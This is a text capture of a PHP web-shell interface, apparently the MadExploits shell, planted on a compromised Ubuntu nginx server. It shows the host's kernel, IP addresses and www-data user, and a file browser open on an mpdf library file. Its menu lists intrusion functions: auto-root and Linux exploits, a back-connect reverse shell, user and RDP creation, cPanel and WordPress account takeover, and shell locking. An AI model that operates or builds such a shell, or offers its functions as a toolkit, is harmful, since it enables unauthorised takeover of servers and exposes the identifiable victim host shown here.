Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
vendor /
mpdf /
mpdf /
src /
Utils /
[ HOME SHELL ]
Name
Size
Permission
Action
Arrays.php
2.03
KB
-rw-rw-r--
NumericString.php
244
B
-rw-rw-r--
PdfDate.php
901
B
-rw-rw-r--
UtfString.php
1.4
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PdfDate.php
<?php namespace Mpdf\Utils; class PdfDate { /** * PDF documents use the internal date format: (D:YYYYMMDDHHmmSSOHH'mm'). The date format has these parts: * * YYYY The full four-digit year. (For example, 2004) * MM The month from 01 to 12. * DD The day from 01 to 31. * HH The hour from 00 to 23. * mm The minute from 00 to 59. * SS The seconds from 00 to 59. * O The relationship of local time to Universal Time (UT), as denoted by one of the characters +, -, or Z. * HH The absolute value of the offset from UT in hours specified as 00 to 23. * mm The absolute value of the offset from UT in minutes specified as 00 to 59. * * @return string */ public static function format($date) { $z = date('O'); // +0200 $offset = substr($z, 0, 3) . "'" . substr($z, 3, 2) . "'"; // +02'00' return date('YmdHis', $date) . $offset; } }
Close